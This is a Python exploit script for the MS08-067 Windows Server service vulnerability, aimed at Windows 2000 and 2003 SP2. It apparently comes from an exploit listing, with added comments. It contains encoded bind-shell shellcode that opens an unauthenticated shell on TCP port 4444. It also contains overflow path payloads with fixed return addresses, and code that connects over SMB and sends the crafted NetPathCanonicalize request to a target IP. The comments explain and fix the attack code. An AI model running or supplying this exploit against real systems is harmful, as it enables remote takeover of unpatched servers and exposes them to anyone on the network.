
# Title : MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
# Published : 2008-11-16
# Author : Debasis Mohanty


#!/usr/bin/env python
#############################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#############################################################################

import struct
import sys

from threading import Thread    #Thread is imported incase you would like to modify
                                #the src to run against multiple targets.

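# Third-party dependencies. Only `uuid` and `transport` are used below; `smb`
# and `dcerpc` are imported so that a missing/partial impacket install is
# detected here rather than deep inside the thread. The module paths are those
# of the 2008-era impacket (current releases reorganised the DCERPC code, e.g.
# impacket.dcerpc.v5.transport -- verify before running against a modern
# install). The parenthesised print() form and the target-less except clause
# are valid on both Python 2 and 3; note the rest of this file relies on
# Python 2 '' literals being byte strings.
try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc import transport
except ImportError:
    print('Install the following library to make this script work')
    print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
    print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
    sys.exit(1)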


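# Start-up banner. Kept as one constant so the trailing newline (lost as a
# literal "n" in some copies of this listing) is visible and testable.
BANNER = (
    '#######################################################################\n'
    '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)\n'
    '#   www.hackingspirits.com\n'
    '#   www.coffeeandsecurity.com\n'
    '#   Email: d3basis.m0hanty @ gmail.com\n'
    '#######################################################################\n'
)
print(BANNER)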


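# Bind-shell shellcode from Metasploit: once it runs on the target it listens
# on TCP/4444 and serves a shell to *whoever connects first*. There is no
# authentication on that port, so on a shared network it is an open door for
# anyone until the hosting process dies -- connect immediately, or swap in a
# reverse/authenticated payload before using this outside a closed lab.
#
# Structure: 16 x 0x90 NOP sled, then what reads as a small XOR decoder stub
# (sub ecx,ecx / sub ecx,-0x50 / call $-1 / pop esi / xor [esi+0x0e],key /
# loop) followed by 0x50 encoded dwords.  Total length: 360 bytes.
#
# This file is Python 2 code: plain '' literals are byte strings. On Python 3
# every literal below would have to become a b'' literal for impacket to
# accept the buffer. (Some web copies of this listing show the bytes without
# the backslashes, e.g. "x90x90"; that is an extraction artefact -- as ASCII
# text the exploit cannot work.)
shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"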


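# Path argument for a Windows 2000 target (92 bytes).
# It starts with the UTF-16LE string "A\..\..\" -- the ".." traversal is what
# the vulnerable path canonicalisation (MS08-067) mishandles -- followed by
# filler, a fixed 4-byte value and a short x86 stub (mov eax,esp / add ax,..
# / mov eax,[eax] / jmp eax, then "\xeb\xcc" = short backward jmp). Those
# bytes are tied to the exact Windows 2000 build the author tested; against
# any other build or service pack the control transfer lands somewhere else
# and the most likely outcome is a crash of the remote Server service, not a
# shell. Select this payload only when the target really is Windows 2000.
# (Copies of this listing that show "x41x00" without backslashes are
# extraction-damaged and cannot work as text.)
payload_1  = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1 += '\x41\x41'
payload_1 += '\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\xeb\xcc'
payload_1 += '\x00\x00'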

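# Path argument for a Windows 2003 SP2 target (92 bytes).
# Same "A\..\..\" UTF-16LE traversal prefix as the 2000 payload, then a short
# x86 stub (mov eax,esp / add ax,.. / mov eax,[eax] / push eax / call esi /
# jmp eax) interleaved with several little-endian values of the form
# 0x77bXxxxx that look like fixed addresses inside 2003 SP2 system DLLs
# (pre-ASLR era). They are specific to that service pack and language build;
# on anything else the request will most likely crash the remote Server
# service rather than return a shell. Verify the target's OS/SP first.
payload_2  = '\x41\x00\x5c\x00'
payload_2 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2 += '\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2 += '\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2 += '\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2 += '\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2 += '\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2 += '\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2 += '\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2 += '\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2 += '\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'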


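# Pick the OS-specific path payload. This has to stay at module level because
# SRVSVC_Exploit reads the global `payload` -- but that also means it executes
# *before* the usage message in the __main__ block, so the argument check
# must live here: without it a missing argument dies with a bare IndexError,
# and an unknown value (anything but '1' or '2') leaves `payload` undefined
# until the thread crashes with a NameError halfway through building the
# request. Fail early and explicitly instead.
if len(sys.argv) < 3 or sys.argv[2] not in ('1', '2'):
    print('Usage: %s <target ip> <os version>   (1 = Windows 2000, 2 = Windows 2003[SP2])'
          % (sys.argv[0] if sys.argv else 'srvsvcexpl.py'))
    sys.exit(-1)

if sys.argv[2] == '1':    # Windows 2000 payload
    payload = payload_1
    print('[-]Windows 2000 payload loaded')
else:                     # Windows 2003[SP2] payload
    payload = payload_2
    print('[-]Windows 2003[SP2] payload loaded')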


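class SRVSVC_Exploit(Thread):
    """One MS08-067 attempt against a single host, run on its own thread.

    The thread opens the target's ``\\pipe\\browser`` named pipe over SMB,
    binds the srvsvc interface and sends a single crafted NetPathCanonicalize
    (opnum 0x1f) request whose string arguments carry the module-level
    ``shellcode`` and the OS-specific ``payload`` chosen at import time.

    Things a tester should know before running it:

    * ``shellcode`` is an unauthenticated bind shell on TCP/4444 -- after a
      successful run anyone who can reach that port owns the box.
    * The addresses baked into ``payload_1``/``payload_2`` are fixed for the
      OS/SP the author targeted; with the wrong selection the remote Server
      service will most likely crash instead of spawning the shell.
    * ``port`` is accepted and stored but never used: the ``ncacn_np:``
      binding string below carries no port, so impacket's default SMB port
      applies. It is kept for call compatibility.
    * No reply is read after the request is written; "sent successfully"
      only means the bytes left the socket.
    """

    def __init__(self, target, osver, port=445):
        """Prepare (but do not start) an attempt against *target*.

        target: host name or IP address of the SMB server.
        osver:  '1' (Windows 2000) or '2' (Windows 2003 SP2); informational
                here -- the payload itself was selected at module load.
        port:   unused, see class docstring.
        """
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target
        self.osver = osver

    def __DCEPacket(self):
        """Connect and bind to srvsvc, then build the request stub."""
        print('[-]Initiating connection')
        # Raw string on purpose: in a normal literal '\b' is a BACKSPACE
        # escape, so '[\pipe\browser]' would silently become
        # '[\pipe<0x08>rowser]' and the pipe open would fail; '\p' is not an
        # escape today but Python 3.6+ warns about it.
        binding = r'ncacn_np:%s[\pipe\browser]' % self.target
        self.__trans = transport.DCERPCTransportFactory(binding)
        self.__trans.connect()
        print('[-]connected to %s' % binding)
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        # srvsvc interface UUID, v3.0 -- the interface NetPathCanonicalize lives on.
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
        self.__stub = self.__build_stub()

    def __build_stub(self):
        """Return the raw NDR stub for the NetPathCanonicalize request.

        The layout appears to follow NetprPathCanonicalize(ServerName,
        PathName, OutBufLen, Prefix, PathType, Flags) from MS-SRVS -- check
        the field order against the spec before changing anything here.
        Plain '' literals are byte strings on Python 2 only.
        """
        # ServerName: referent id, then a conformant/varying WCHAR string with
        # max count / offset / actual count = 0xd6 (214 WCHARs = 428 bytes),
        # which is exactly len(shellcode)=360 + 64 filler bytes + 4 nul bytes.
        stub = '\x01\x00\x00\x00'
        stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        stub += shellcode
        stub += '\x41' * 64
        stub += '\x00\x00\x00\x00'
        # PathName: counts of 0x2f (47 WCHARs) followed by the selected
        # OS-specific path payload; the trailing nul bytes presumably cover
        # the string terminator plus 4-byte alignment.
        stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        stub += payload
        stub += '\x00\x00\x00\x00'
        # Remaining scalar/string arguments: a length of 2, a one-character
        # conformant/varying string L"\" (counts 2/0/2, data 0x5c 0x00 + pad),
        # then two dwords of 1.
        stub += '\x02\x00\x00\x00'
        stub += '\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00'
        stub += '\x5c\x00\x00\x00'
        stub += '\x01\x00\x00\x00'
        stub += '\x01\x00\x00\x00'
        return stub

    def run(self):
        """Thread body: connect, bind, fire the request, report."""
        self.__DCEPacket()
        # 0x1f (31) = NetPathCanonicalize. The call's response is not read,
        # so the message below does not prove the exploit worked.
        self.__dce.call(0x1f, self.__stub)
        print('[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...')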

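if __name__ == '__main__':
    # Usage: srvsvcexpl.py <target ip> <os version>; os version 1 = Windows
    # 2000, 2 = Windows 2003[SP2]. Note the payload selection at module level
    # above already consumes sys.argv[2], so a bad/missing argument is
    # normally reported there before this block ever runs.
    try:
        target = sys.argv[1]
        osver = sys.argv[2]
    except IndexError:
        print('\nUsage: %s <target ip> <os version>\n' % sys.argv[0])
        print('Example: srvsvcexpl.py 192.168.1.1 2\n')
        print('Select OS Version')
        print('[-]Windows 2000: OS Version = 1')
        print('[-]Windows 2003[SP2]: OS Version = 2')
        sys.exit(-1)

    # Kept under the __main__ guard: the Thread subclass is meant to be
    # reusable against several targets, and importing this module must not
    # fire an exploit at whatever sys.argv happens to hold.
    current = SRVSVC_Exploit(target, osver)
    current.start()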
